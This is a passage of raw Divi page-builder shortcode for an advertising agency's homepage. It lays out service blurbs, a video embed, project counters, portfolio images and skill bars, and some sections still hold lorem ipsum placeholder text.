style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-48px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" 